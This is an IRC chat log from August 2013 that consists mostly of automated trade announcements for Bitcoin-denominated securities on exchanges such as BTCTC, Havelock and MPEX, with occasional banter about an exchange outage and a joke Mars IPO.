[BTCTC] [DMS.PURCHASE] 120 @ 0.02051 = 2.4612 BTC [-] Aug 24 01:56:59 [BTCTC] [DMS.SELLING] 4 @ 0.01727 = 0.0691 BTC [+] Aug 24 01:58:36 [BTCTC] [DMS.SELLING] 88 @ 0.01726 = 1.5189 BTC [-] Aug 24 01:58:38 [BTCTC] [DMS.MINING] 88 @ 0.0034 = 0.2992 BTC [-] Aug 24 01:58:40 [BTCTC] [DMS.PURCHASE] 88 @ 0.02051 = 1.8049 BTC [-] Aug 24 01:59:15 [BTCTC] [LABCOIN] 5 @ 0.002742 = 0.0137 BTC [-] Aug 24 02:00:37 [BTCTC] [ASICMINER-PT] 2 @ 3.5 = 7 BTC [+] Aug 24 02:02:39 [HAVELOCK] [SDSTM] 27 @ 0.005 = 0.135 BTC [-] Aug 24 02:05:29 [BTCTC] [DMS.PURCHASE] 1 @ 0.02051 BTC [-] Aug 24 02:12:10 [BTCTC] [ASICMINER-PT] 1 @ 2.871 BTC [-] Aug 24 02:12:11 [BTCTC] [ASICMINER-PT] 1 @ 2.87 BTC [-] Aug 24 02:12:13 [BTCTC] [ASICMINER-PT] 1 @ 2.86 BTC [-] Aug 24 02:12:14 [BTCTC] [ASICMINER-PT] 3 @ 2.857 = 8.571 BTC [-] Aug 24 02:12:16 [BTCTC] [ASICMINER-PT] 8 @ 2.856 = 22.848 BTC [-] Aug 24 02:12:17 [BTCTC] [ASICMINER-PT] 1 @ 2.854 BTC [-] Aug 24 02:12:18 [BTCTC] [ASICMINER-PT] 4 @ 2.834 = 11.336 BTC [-] Aug 24 02:12:19 [BTCTC] [ASICMINER-PT] 2 @ 2.833 = 5.666 BTC [-] Aug 24 02:12:21 [BTCTC] [ASICMINER-PT] 5 @ 2.832 = 14.16 BTC [-] Aug 24 02:12:22 [BTCTC] [ASICMINER-PT] 1 @ 2.831 BTC [-] Aug 24 02:12:23 [BTCTC] [ASICMINER-PT] 2 @ 2.83 = 5.66 BTC [-] Aug 24 02:12:24 [BTCTC] [ASICMINER-PT] 2 @ 2.812 = 5.624 BTC [-] Aug 24 02:12:33 [BTCTC] [ASICMINER-PT] 2 @ 2.81 = 5.62 BTC [-] Aug 24 02:12:34 [BTCTC] [ASICMINER-PT] 1 @ 2.803 BTC [-] Aug 24 02:12:35 [BTCTC] [ASICMINER-PT] 1 @ 2.802 BTC [-] Aug 24 02:12:36 [BTCTC] [ASICMINER-PT] 2 @ 2.802 = 5.604 BTC [-] Aug 24 02:12:37 [BTCTC] [ASICMINER-PT] 2 @ 2.802 = 5.604 BTC [-] Aug 24 02:12:38 [BTCTC] [ASICMINER-PT] 2 @ 2.801 = 5.602 BTC [-] Aug 24 02:12:39 [BTCTC] [ASICMINER-PT] 1 @ 2.8 BTC [-] Aug 24 02:12:41 [BTCTC] [ASICMINER-PT] 1 @ 2.8 BTC [-] Aug 24 02:12:42 [BTCTC] [ASICMINER-PT] 5 @ 2.8 = 14 BTC [-] Aug 24 02:12:43 [BTCTC] [ASICMINER-PT] 1 @ 2.8 BTC [-] Aug 24 02:12:44 [BTCTC] [ASICMINER-PT] 1 @ 2.8 BTC [-] Aug 24 02:13:03 [BTCTC] [TAT.ASICMINER] 67 @ 0.02891 = 1.937 BTC [-] Aug 24 02:13:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.0289 BTC [-] Aug 24 02:13:06 [BTCTC] [TAT.ASICMINER] 1 @ 0.02801 BTC [-] Aug 24 02:13:06 [BTCTC] [TAT.ASICMINER] 66 @ 0.02801 = 1.8487 BTC [-] Aug 24 02:13:07 [BTCTC] [TAT.ASICMINER] 22 @ 0.028 = 0.616 BTC [-] Aug 24 02:13:08 [BTCTC] [TAT.ASICMINER] 10 @ 0.028 = 0.28 BTC [-] Aug 24 02:13:26 [HAVELOCK] [AM1] 5 @ 2.8 = 14 BTC [+] Aug 24 02:19:39 [HAVELOCK] [AM100] 1 @ 0.028 BTC [-] Aug 24 02:25:57 3 minutes if you know how to do it << qft Aug 24 02:26:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.02938 BTC [+] Aug 24 02:34:05 [HAVELOCK] [AM100] 1 @ 0.027 BTC [-] Aug 24 02:36:06 [BTCTC] [BASIC-MINING] 1 @ 0.2605 BTC [+] Aug 24 02:36:08 [BTCTC] [BASIC-MINING] 9 @ 0.2604 = 2.3436 BTC [-] Aug 24 02:36:09 [BTCTC] [BASIC-MINING] 65 @ 0.2603 = 16.9195 BTC [-] Aug 24 02:36:10 [BTCTC] [BASIC-MINING] 1 @ 0.2602 BTC [-] Aug 24 02:36:12 [BTCTC] [BASIC-MINING] 1 @ 0.2602 BTC [-] Aug 24 02:36:12 [BTCTC] [BASIC-MINING] 42 @ 0.2602 = 10.9284 BTC [-] Aug 24 02:36:13 [BTCTC] [BASIC-MINING] 2 @ 0.2602 = 0.5204 BTC [-] Aug 24 02:36:14 [BTCTC] [BASIC-MINING] 4 @ 0.2601 = 1.0404 BTC [-] Aug 24 02:36:15 [BTCTC] [BASIC-MINING] 16 @ 0.2553 = 4.0848 BTC [-] Aug 24 02:36:16 [BTCTC] [BASIC-MINING] 100 @ 0.2552 = 25.52 BTC [-] Aug 24 02:36:18 [BTCTC] [BASIC-MINING] 63 @ 0.255 = 16.065 BTC [-] Aug 24 02:36:19 [BTCTC] [BASIC-MINING] 4 @ 0.2533 = 1.0132 BTC [-] Aug 24 02:36:20 [BTCTC] [BASIC-MINING] 1 @ 0.251 BTC [-] Aug 24 02:36:21 [BTCTC] [BASIC-MINING] 7 @ 0.25 = 1.75 BTC [-] Aug 24 02:36:22 [BTCTC] [BASIC-MINING] 40 @ 0.25 = 10 BTC [-] Aug 24 02:36:23 [BTCTC] [BASIC-MINING] 15 @ 0.25 = 3.75 BTC [-] Aug 24 02:47:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.02915 BTC [-] Aug 24 02:52:50 [BTCTC] [DMS.PURCHASE] 1 @ 0.02051 BTC [-] Aug 24 02:56:32 [BTCTC] [HOSTED-MINING] 1 @ 0.28 BTC [+] Aug 24 02:56:52 [BTCTC] [HOSTED-MINING] 175 @ 0.28 = 49 BTC [+] Aug 24 03:06:31 [BTCTC] [ASICMINER-PT] 20 @ 2.8 = 56 BTC [-] Aug 24 03:15:46 [BTCTC] [TAT.ASICMINER] 5 @ 0.02883 = 0.1442 BTC [-] Aug 24 03:15:57 [BTCTC] [DMS.PURCHASE] 27 @ 0.02051 = 0.5538 BTC [-] Aug 24 03:15:59 [BTCTC] [DMS.PURCHASE] 473 @ 0.02052 = 9.706 BTC [+] Aug 24 03:17:27 [BTCTC] [TAT.ASICMINER] 7 @ 0.02881 = 0.2017 BTC [-] Aug 24 03:18:58 [BTCTC] [DMS.MINING] 2 @ 0.0035 = 0.007 BTC [+] Aug 24 03:21:45 [BTCTC] [TAT.ASICMINER] 16 @ 0.02803 = 0.4485 BTC [-] Aug 24 03:27:27 [HAVELOCK] [AM100] 2 @ 0.0278 = 0.0556 BTC [+] Aug 24 03:27:46 [BTCTC] [ASICMINER-PT] 2 @ 2.771 = 5.542 BTC [-] Aug 24 03:29:49 [MPEX] [S.MPOE] 6600 @ 0.00081878 = 5.4039 BTC [-] Aug 24 03:30:29 Yup Aug 24 03:32:28 [BTCTC] [DMS.MINING] 4 @ 0.0035 = 0.014 BTC [+] Aug 24 03:34:11 [BTCTC] [ASICMINER-PT] 2 @ 2.77 = 5.54 BTC [-] Aug 24 03:36:26 [BTCTC] [TAT.ASICMINER] 19 @ 0.02812 = 0.5343 BTC [+] Aug 24 03:37:52 [BTCTC] [DMS.SELLING] 318 @ 0.01711 = 5.441 BTC [-] Aug 24 03:39:34 [MPEX] [S.MPOE] 1000 @ 0.00081878 = 0.8188 BTC [-] Aug 24 03:44:55 [BTCTC] [S.MPOE-PT] 10 @ 0.0008331 = 0.0083 BTC [-] Aug 24 03:46:43 [HAVELOCK] [XBOND] 5 @ 0.00117 = 0.0059 BTC [+] Aug 24 03:51:44 [BTCTC] [S.MPOE-PT] 694 @ 0.000833 = 0.5781 BTC [-] Aug 24 03:51:50 [BTCTC] [COGNITIVE] 7 @ 0.3285 = 2.2995 BTC [+] Aug 24 03:51:52 [BTCTC] [COGNITIVE] 1 @ 0.338 BTC [+] Aug 24 03:51:53 [BTCTC] [ACTIVEMINING] 1 @ 0.00563 BTC [+] Aug 24 03:51:54 [BTCTC] [COGNITIVE] 10 @ 0.3535 = 3.535 BTC [+] Aug 24 03:52:49 [BTCTC] [RSM] 5 @ 0.011 = 0.055 BTC [+] Aug 24 03:53:16 [BTCTC] [DMS.PURCHASE] 1 @ 0.02052 BTC [+] Aug 24 03:53:58 [BTCTC] [RSM] 47 @ 0.0115 = 0.5405 BTC [+] Aug 24 03:53:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.02919 BTC [+] Aug 24 03:54:03 [BTCTC] [TAT.ASICMINER] 50 @ 0.0292 = 1.46 BTC [+] Aug 24 03:54:04 [BTCTC] [TAT.ASICMINER] 17 @ 0.02938 = 0.4995 BTC [+] Aug 24 03:54:06 [BTCTC] [TAT.ASICMINER] 32 @ 0.02939 = 0.9405 BTC [+] Aug 24 03:54:13 [HAVELOCK] [CFIG] 17 @ 0.1455 = 2.4735 BTC [+] Aug 24 03:54:19 [HAVELOCK] [CFIG] 1 @ 0.1455 BTC [+] Aug 24 03:54:22 [BTCTC] [TAT.VIRTUALMINE] 8 @ 0.001249 = 0.01 BTC [-] Aug 24 03:58:29 [BTCTC] [LABCOIN] 8 @ 0.002738 = 0.0219 BTC [-] Aug 24 03:58:29 [BTCTC] [LABCOIN] 362 @ 0.002738 = 0.9912 BTC [-] Aug 24 04:01:18 [BTCTC] [LABCOIN] 3 @ 0.002738 = 0.0082 BTC [-] Aug 24 04:04:13 [MPEX] [S.MPOE] 7800 @ 0.00081878 = 6.3865 BTC [-] Aug 24 04:04:15 [MPEX] [S.MPOE] 8514 @ 0.00081945 = 6.9768 BTC [+] Aug 24 04:09:27 .d Aug 24 04:09:27 50810339.04828 | Next Diff in 109 blocks | Estimated Change: 28.7933% in 0d 12h 42m 16s Aug 24 04:11:10 [BTCTC] [LABCOIN] 190 @ 0.002738 = 0.5202 BTC [-] Aug 24 04:11:11 [BTCTC] [LABCOIN] 1050 @ 0.002739 = 2.876 BTC [+] Aug 24 04:11:13 [BTCTC] [LABCOIN] 500 @ 0.00274 = 1.37 BTC [+] Aug 24 04:11:14 [BTCTC] [LABCOIN] 200 @ 0.002741 = 0.5482 BTC [+] Aug 24 04:11:15 [BTCTC] [LABCOIN] 2023 @ 0.002742 = 5.5471 BTC [+] Aug 24 04:11:16 [BTCTC] [LABCOIN] 11 @ 0.002743 = 0.0302 BTC [+] Aug 24 04:11:17 [BTCTC] [LABCOIN] 5 @ 0.002745 = 0.0137 BTC [+] Aug 24 04:11:17 [BTCTC] [LABCOIN] 1 @ 0.002747 BTC [+] Aug 24 04:11:18 [BTCTC] [LABCOIN] 27800 @ 0.002749 = 76.4222 BTC [+] Aug 24 04:11:51 [BTCTC] [RSM] 3 @ 0.0115 = 0.0345 BTC [+] Aug 24 04:12:48 [BTCTC] [LABCOIN] 450 @ 0.00275 = 1.2375 BTC [+] Aug 24 04:14:40 [BTCTC] [LABCOIN] 85 @ 0.002663 = 0.2264 BTC [-] Aug 24 04:14:42 [BTCTC] [LABCOIN] 27 @ 0.002661 = 0.0718 BTC [-] Aug 24 04:14:43 [BTCTC] [LABCOIN] 25 @ 0.00266 = 0.0665 BTC [-] Aug 24 04:14:44 [BTCTC] [LABCOIN] 5 @ 0.002658 = 0.0133 BTC [-] Aug 24 04:14:45 [BTCTC] [LABCOIN] 20 @ 0.002657 = 0.0531 BTC [-] Aug 24 04:14:47 [BTCTC] [LABCOIN] 27 @ 0.002641 = 0.0713 BTC [-] Aug 24 04:14:47 [BTCTC] [LABCOIN] 110 @ 0.00264 = 0.2904 BTC [-] Aug 24 04:14:48 [BTCTC] [LABCOIN] 375 @ 0.002631 = 0.9866 BTC [-] Aug 24 04:14:49 [BTCTC] [LABCOIN] 354 @ 0.00263 = 0.931 BTC [-] Aug 24 04:15:38 [BTCTC] [ACTIVEMINING] 1 @ 0.0056 BTC [-] Aug 24 04:15:40 [BTCTC] [ACTIVEMINING] 14 @ 0.005528 = 0.0774 BTC [-] Aug 24 04:17:27 [BTCTC] [LABCOIN] 85 @ 0.002634 = 0.2239 BTC [+] Aug 24 04:17:29 [BTCTC] [LABCOIN] 26 @ 0.002633 = 0.0685 BTC [-] Aug 24 04:17:30 [BTCTC] [LABCOIN] 20 @ 0.002632 = 0.0526 BTC [-] Aug 24 04:17:31 [BTCTC] [LABCOIN] 286 @ 0.002631 = 0.7525 BTC [-] Aug 24 04:17:32 [BTCTC] [LABCOIN] 31 @ 0.00263 = 0.0815 BTC [-] Aug 24 04:17:57 [BTCTC] [RSM] 15 @ 0.0115 = 0.1725 BTC [+] Aug 24 04:18:38 [BTCTC] [ACTIVEMINING] 6 @ 0.005628 = 0.0338 BTC [+] Aug 24 04:18:39 [BTCTC] [ACTIVEMINING] 14 @ 0.005629 = 0.0788 BTC [+] Aug 24 04:18:40 [BTCTC] [ACTIVEMINING] 10 @ 0.005631 = 0.0563 BTC [+] Aug 24 04:18:41 [BTCTC] [ACTIVEMINING] 98 @ 0.005635 = 0.5522 BTC [+] Aug 24 04:18:43 [BTCTC] [ACTIVEMINING] 278 @ 0.005635 = 1.5665 BTC [+] Aug 24 04:18:44 [BTCTC] [ACTIVEMINING] 120 @ 0.005636 = 0.6763 BTC [+] Aug 24 04:18:45 [BTCTC] [ACTIVEMINING] 95 @ 0.005637 = 0.5355 BTC [+] Aug 24 04:18:46 [BTCTC] [ACTIVEMINING] 100 @ 0.005638 = 0.5638 BTC [+] Aug 24 04:18:47 [BTCTC] [ACTIVEMINING] 97 @ 0.005639 = 0.547 BTC [+] Aug 24 04:18:48 [BTCTC] [ACTIVEMINING] 700 @ 0.00564 = 3.948 BTC [+] Aug 24 04:18:49 [BTCTC] [ACTIVEMINING] 482 @ 0.005647 = 2.7219 BTC [+] Aug 24 04:22:47 [BTCTC] [LABCOIN] 284 @ 0.002631 = 0.7472 BTC [+] Aug 24 04:22:49 [BTCTC] [LABCOIN] 20 @ 0.00263 = 0.0526 BTC [-] Aug 24 04:22:50 [BTCTC] [LABCOIN] 200 @ 0.00263 = 0.526 BTC [-] Aug 24 04:22:51 [BTCTC] [LABCOIN] 1116 @ 0.002628 = 2.9328 BTC [-] Aug 24 04:22:52 [BTCTC] [LABCOIN] 860 @ 0.002625 = 2.2575 BTC [-] Aug 24 04:22:54 [BTCTC] [LABCOIN] 300 @ 0.002625 = 0.7875 BTC [-] Aug 24 04:22:55 [BTCTC] [LABCOIN] 1326 @ 0.002624 = 3.4794 BTC [-] Aug 24 04:22:56 [BTCTC] [LABCOIN] 115 @ 0.002623 = 0.3016 BTC [-] Aug 24 04:22:57 [BTCTC] [LABCOIN] 1800 @ 0.002623 = 4.7214 BTC [-] Aug 24 04:22:58 [BTCTC] [LABCOIN] 200 @ 0.002623 = 0.5246 BTC [-] Aug 24 04:22:58 [BTCTC] [LABCOIN] 375 @ 0.002621 = 0.9829 BTC [-] Aug 24 04:22:59 [BTCTC] [LABCOIN] 1295 @ 0.00262 = 3.3929 BTC [-] Aug 24 04:28:38 [BTCTC] [ACTIVEMINING] 256 @ 0.005647 = 1.4456 BTC [+] Aug 24 04:29:14 [BTCTC] [ACTIVEMINING] 100 @ 0.005648 = 0.5648 BTC [+] Aug 24 04:30:33 [BTCTC] [ACTIVEMINING] 1000 @ 0.005649 = 5.649 BTC [+] Aug 24 04:31:13 [HAVELOCK] [CFIG] 10 @ 0.141 = 1.41 BTC [-] Aug 24 04:34:09 [BTCTC] [LABCOIN] 130 @ 0.002627 = 0.3415 BTC [+] Aug 24 04:34:11 [BTCTC] [LABCOIN] 20 @ 0.002626 = 0.0525 BTC [-] Aug 24 04:34:12 [BTCTC] [LABCOIN] 500 @ 0.002624 = 1.312 BTC [-] Aug 24 04:40:28 [BTCTC] [BITVPS] 17 @ 0.002285 = 0.0388 BTC [+] Aug 24 04:41:14 [BTCTC] [BITVPS] 5 @ 0.002599 = 0.013 BTC [+] Aug 24 04:42:20 [BTCTC] [LABCOIN] 5 @ 0.002626 = 0.0131 BTC [+] Aug 24 04:42:20 [BTCTC] [LABCOIN] 20 @ 0.002625 = 0.0525 BTC [-] Aug 24 04:42:22 [BTCTC] [LABCOIN] 52 @ 0.002622 = 0.1363 BTC [-] Aug 24 04:42:23 [BTCTC] [LABCOIN] 4 @ 0.002621 = 0.0105 BTC [-] Aug 24 04:42:24 [BTCTC] [LABCOIN] 205 @ 0.00262 = 0.5371 BTC [-] Aug 24 04:42:25 [BTCTC] [LABCOIN] 402 @ 0.002612 = 1.05 BTC [-] Aug 24 04:42:26 [BTCTC] [LABCOIN] 1600 @ 0.002611 = 4.1776 BTC [-] Aug 24 04:42:27 [BTCTC] [LABCOIN] 9 @ 0.002611 = 0.0235 BTC [-] Aug 24 04:42:29 [BTCTC] [LABCOIN] 580 @ 0.002604 = 1.5103 BTC [-] Aug 24 04:42:30 [BTCTC] [LABCOIN] 2320 @ 0.002603 = 6.039 BTC [-] Aug 24 04:42:31 [BTCTC] [LABCOIN] 1025 @ 0.002602 = 2.6671 BTC [-] Aug 24 04:42:31 [BTCTC] [LABCOIN] 2500 @ 0.002601 = 6.5025 BTC [-] Aug 24 04:42:32 [BTCTC] [LABCOIN] 1580 @ 0.0026 = 4.108 BTC [-] Aug 24 04:42:45 [BTCTC] [LABCOIN] 20 @ 0.0026 = 0.052 BTC [-] Aug 24 04:45:36 time to cash out Aug 24 05:17:18 wtf burnside Aug 24 05:17:27 need to be logged in to view the market now Aug 24 05:17:36 because that will keep him out of gitmo Aug 24 05:22:07 .d Aug 24 05:22:07 50810339.04828 | Next Diff in 100 blocks | Estimated Change: 28.7144% in 0d 11h 45m 18s Aug 24 05:22:18 i think that's the funniest thing I've heard all day dub Aug 24 05:23:39 no need to panic, he is gonna put up a static html page or similar that doesnt query the database and is safe from ddos Aug 24 05:24:45 the new tos is hilarious Aug 24 05:25:32 lol Aug 24 05:25:35 he's getting dos'ed Aug 24 05:28:18 assbot is being ddos too.. damn thing is not updating Aug 24 05:28:56 heh.. guess its not even online Aug 24 05:29:08 clearly ddos Aug 24 05:29:52 oo noes!!! assbot is being synflooded Aug 24 05:30:17 feels like btct hits maximum capacity at 3 trades a second Aug 24 05:31:36 must be running microsoft accsess 98 in the backend **** BEGIN LOGGING AT Sat Aug 24 12:59:48 2013 **** BEGIN LOGGING AT Sat Aug 24 13:18:21 2013 **** BEGIN LOGGING AT Sat Aug 24 13:19:26 2013 Aug 24 13:22:42 [BTCTC] [DMS.SELLING] 100 @ 0.01698 = 1.698 BTC [+] Aug 24 13:24:34 [BTCTC] [LABCOIN] 7 @ 0.00299 = 0.0209 BTC [-] Aug 24 13:25:42 [MPEX] [S.MG] 5000 @ 0.0002 = 1 BTC [-] Aug 24 13:25:44 [MPEX] [S.MG] 2200 @ 0.00019 = 0.418 BTC [-] Aug 24 13:38:15 hey i'm thinking to do an ipo to send myself to Mars - https://apply.mars-one.com/ Aug 24 13:39:34 [MPEX] [S.MPOE] 18811 @ 0.00083138 = 15.6391 BTC [+] Aug 24 13:40:08 lol Aug 24 13:41:12 Earth no longer has the abilities to sustain Ametyst profit margins and we must relocate to mars Aug 24 13:42:00 and start mining bitcoins on mars of course Aug 24 13:42:58 [BTCTC] [DMS.SELLING] 10 @ 0.01698 = 0.1698 BTC [+] Aug 24 13:44:05 isn't mars kinda hot ? Aug 24 13:45:37 the first 1 million bitcoins will be used to buy aircondition Aug 24 13:46:00 [BTCTC] [RSM] 5 @ 0.0114 = 0.057 BTC [+] Aug 24 13:46:16 but mars atmosphere is corrosive Aug 24 13:48:01 [BTCTC] [ACTIVEMINING] 68 @ 0.005439 = 0.3699 BTC [+] Aug 24 13:48:02 [BTCTC] [ACTIVEMINING] 8 @ 0.00544 = 0.0435 BTC [+] Aug 24 13:48:35 okey? Aug 24 13:48:55 so far this is proceeding exactly like a proper forum ipo. Aug 24 13:53:50 :) Aug 24 13:55:19 shut up and take my money? Aug 24 13:58:22 [BTCTC] [ASICMINER-PT] 1 @ 2.75 BTC [+] Aug 24 13:59:09 [BTCTC] [ACTIVEMINING] 25 @ 0.005583 = 0.1396 BTC [+] Aug 24 14:02:30 [BTCTC] [LABCOIN] 4 @ 0.00299 = 0.012 BTC [-] Aug 24 14:12:26 [BTCTC] [LABCOIN] 100 @ 0.002989 = 0.2989 BTC [-] Aug 24 14:12:26 [BTCTC] [LABCOIN] 900 @ 0.00299 = 2.691 BTC [+] Aug 24 14:14:15 [BTCTC] [LABCOIN] 3 @ 0.002951 = 0.0089 BTC [-] Aug 24 14:14:59 [BTCTC] [LABCOIN] 2 @ 0.002951 = 0.0059 BTC [-] Aug 24 14:15:35 [BTCTC] [LABCOIN] 4 @ 0.002951 = 0.0118 BTC [-] Aug 24 14:15:44 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0012 BTC [-] Aug 24 14:15:45 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0011 BTC [-] Aug 24 14:15:47 [BTCTC] [TAT.VIRTUALMINE] 49 @ 0.001052 = 0.0515 BTC [-] Aug 24 14:15:48 [BTCTC] [TAT.VIRTUALMINE] 99 @ 0.001051 = 0.104 BTC [-] Aug 24 14:16:36 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00105 BTC [-] Aug 24 14:16:38 [BTCTC] [TAT.VIRTUALMINE] 104 @ 0.001022 = 0.1063 BTC [-] Aug 24 14:16:39 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.001021 = 0.0204 BTC [-] Aug 24 14:16:39 [BTCTC] [TAT.VIRTUALMINE] 27 @ 0.00102 = 0.0275 BTC [-] Aug 24 14:16:40 [BTCTC] [TAT.VIRTUALMINE] 27 @ 0.00102 = 0.0275 BTC [-] Aug 24 14:17:16 [BTCTC] [ASICMINER-PT] 1 @ 2.789 BTC [+] Aug 24 14:17:17 [BTCTC] [ASICMINER-PT] 1 @ 2.79 BTC [+] Aug 24 14:17:33 [BTCTC] [TAT.VIRTUALMINE] 15 @ 0.00101 = 0.0152 BTC [-] Aug 24 14:17:35 [BTCTC] [TAT.VIRTUALMINE] 11 @ 0.001 = 0.011 BTC [-] Aug 24 14:17:36 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.001 = 0.02 BTC [-] Aug 24 14:17:37 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.000999 BTC [-] Aug 24 14:17:38 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.000999 BTC [-] Aug 24 14:17:40 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.000971 = 0.0058 BTC [-] Aug 24 14:17:40 why do you have all this evil propoganda about mars? Aug 24 14:17:41 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00095 BTC [-] Aug 24 14:17:41 [BTCTC] [TAT.VIRTUALMINE] 15 @ 0.000891 = 0.0134 BTC [-] Aug 24 14:17:43 [BTCTC] [TAT.VIRTUALMINE] 90 @ 0.00089 = 0.0801 BTC [-] Aug 24 14:19:14 [HAVELOCK] [CFIG] 2 @ 0.148 = 0.296 BTC [-] Aug 24 14:19:25 i will buy mars bitcoin for 2.718 gaia bitcoin Aug 24 14:19:45 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1961 BTC [-] Aug 24 14:19:46 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1961 BTC [-] Aug 24 14:19:48 [BTCTC] [CRYPTO-TRADE] 2 @ 0.196 = 0.392 BTC [-] Aug 24 14:22:12 [BTCTC] [DMS.PURCHASE] 38 @ 0.02052 = 0.7798 BTC [+] Aug 24 14:23:40 [BTCTC] [HOSTED-MINING] 1 @ 0.2715 BTC [-] Aug 24 14:23:42 [BTCTC] [HOSTED-MINING] 3 @ 0.271 = 0.813 BTC [-] Aug 24 14:24:31 [BTCTC] [DMS.PURCHASE] 52 @ 0.02052 = 1.067 BTC [+] Aug 24 14:25:25 [BTCTC] [KENILWORTH] 5 @ 0.0018 = 0.009 BTC [+] Aug 24 14:29:17 [HAVELOCK] [AM100] 1 @ 0.0278 BTC [+] Aug 24 14:29:55 [BTCTC] [DMS.PURCHASE] 115 @ 0.02052 = 2.3598 BTC [+] Aug 24 14:30:50 [BTCTC] [TAT.ASICMINER] 6 @ 0.0275 = 0.165 BTC [-] Aug 24 14:31:25 [BTCTC] [DMS.PURCHASE] 8 @ 0.02052 = 0.1642 BTC [+] Aug 24 14:32:45 [MPEX] [S.MPOE] 9199 @ 0.00083138 = 7.6479 BTC [+] Aug 24 14:32:47 [MPEX] [S.MPOE] 4421 @ 0.00082834 = 3.6621 BTC [-] Aug 24 14:46:33 [BTCTC] [ASICMINER-PT] 1 @ 2.751 BTC [-] Aug 24 14:49:05 [BTCTC] [LABCOIN] 11 @ 0.002951 = 0.0325 BTC [-] Aug 24 14:49:06 [BTCTC] [LABCOIN] 1660 @ 0.00295 = 4.897 BTC [-] Aug 24 14:50:07 [BTCTC] [LABCOIN] 85 @ 0.002894 = 0.246 BTC [-] Aug 24 14:50:08 [BTCTC] [LABCOIN] 35 @ 0.002893 = 0.1013 BTC [-] Aug 24 14:50:10 [BTCTC] [LABCOIN] 600 @ 0.00289 = 1.734 BTC [-] Aug 24 14:50:11 [BTCTC] [LABCOIN] 545 @ 0.00289 = 1.5751 BTC [-] Aug 24 14:50:12 [BTCTC] [LABCOIN] 840 @ 0.002889 = 2.4268 BTC [-] Aug 24 14:50:13 [BTCTC] [LABCOIN] 1000 @ 0.002888 = 2.888 BTC [-] Aug 24 14:50:14 [BTCTC] [LABCOIN] 340 @ 0.002887 = 0.9816 BTC [-] Aug 24 14:50:15 [BTCTC] [LABCOIN] 207 @ 0.002865 = 0.5931 BTC [-] Aug 24 14:50:16 [BTCTC] [LABCOIN] 830 @ 0.002864 = 2.3771 BTC [-] Aug 24 14:50:17 [BTCTC] [LABCOIN] 2500 @ 0.002863 = 7.1575 BTC [-] Aug 24 14:50:18 [BTCTC] [LABCOIN] 5000 @ 0.002862 = 14.31 BTC [-] Aug 24 14:50:19 [BTCTC] [LABCOIN] 5000 @ 0.00286 = 14.3 BTC [-] Aug 24 14:50:20 [BTCTC] [LABCOIN] 1760 @ 0.002852 = 5.0195 BTC [-] Aug 24 14:50:21 [BTCTC] [LABCOIN] 40 @ 0.002851 = 0.114 BTC [-] Aug 24 14:50:22 [BTCTC] [LABCOIN] 2000 @ 0.002851 = 5.702 BTC [-] Aug 24 14:50:23 [BTCTC] [LABCOIN] 5000 @ 0.00285 = 14.25 BTC [-] Aug 24 14:50:24 [BTCTC] [LABCOIN] 3601 @ 0.002833 = 10.2016 BTC [-] Aug 24 14:50:24 [BTCTC] [LABCOIN] 10000 @ 0.002832 = 28.32 BTC [-] Aug 24 14:50:25 [BTCTC] [LABCOIN] 4405 @ 0.002832 = 12.475 BTC [-] Aug 24 14:50:26 [BTCTC] [LABCOIN] 6352 @ 0.002831 = 17.9825 BTC [-] Aug 24 14:50:27 [BTCTC] [LABCOIN] 20000 @ 0.00283 = 56.6 BTC [-] Aug 24 14:50:29 [BTCTC] [LABCOIN] 6934 @ 0.00283 = 19.6232 BTC [-] Aug 24 14:51:27 oh crap, marone actually accepts bitcoin payment Aug 24 14:55:38 [HAVELOCK] [LABCO] 500 @ 0.0027 = 1.35 BTC [-] Aug 24 14:56:44 [HAVELOCK] [XBOND] 633 @ 0.00116899 = 0.74 BTC [-] Aug 24 14:58:30 [HAVELOCK] [AM100] 70 @ 0.0278 = 1.946 BTC [+] Aug 24 14:59:51 [HAVELOCK] [XBOND] [PAID] 1.00978800 BTC to 2`019`576 shares, 50 satoshi per share Aug 24 15:01:14 [BTCTC] [LABCOIN] 85 @ 0.002976 = 0.253 BTC [+] Aug 24 15:01:16 [BTCTC] [LABCOIN] 189 @ 0.002977 = 0.5627 BTC [+] Aug 24 15:01:17 [BTCTC] [LABCOIN] 830 @ 0.002978 = 2.4717 BTC [+] Aug 24 15:01:18 [BTCTC] [LABCOIN] 2229 @ 0.002979 = 6.6402 BTC [+] Aug 24 15:01:40 [HAVELOCK] [AM100] 16 @ 0.0278 = 0.4448 BTC [+] Aug 24 15:04:45 .d Aug 24 15:04:45 50810339.04828 | Next Diff in 16 blocks | Estimated Change: 29.2410% in 0d 1h 52m 19s Aug 24 15:05:15 [BTCTC] [LABCOIN] 180 @ 0.002975 = 0.5355 BTC [-] Aug 24 15:14:52 [HAVELOCK] [AM100] 1 @ 0.0281199 BTC [+] Aug 24 15:16:49 [BTCTC] [KENILWORTH] 4 @ 0.0018 = 0.0072 BTC [+] Aug 24 15:17:27 [BTCTC] [BTC-BOND] 1 @ 0.009998 BTC [-] Aug 24 15:21:34 [BTCTC] [LABCOIN] 85 @ 0.002886 = 0.2453 BTC [-] Aug 24 15:21:36 [BTCTC] [LABCOIN] 20 @ 0.002885 = 0.0577 BTC [-] Aug 24 15:21:37 [BTCTC] [LABCOIN] 19 @ 0.002883 = 0.0548 BTC [-] Aug 24 15:24:25 [HAVELOCK] [XBOND] 49 @ 0.00116899 = 0.0573 BTC [-] Aug 24 15:24:52 [HAVELOCK] [XBOND] 31 @ 0.00116899 = 0.0362 BTC [-] Aug 24 15:25:28 [BTCTC] [DMS.SELLING] 100 @ 0.01699 = 1.699 BTC [+] Aug 24 15:30:16 [BTCTC] [DMS.MINING] 170 @ 0.003848 = 0.6542 BTC [-] Aug 24 15:30:49 [BTCTC] [KENILWORTH] 1 @ 0.001601 BTC [-] Aug 24 15:31:48 [HAVELOCK] [XBOND] 1750 @ 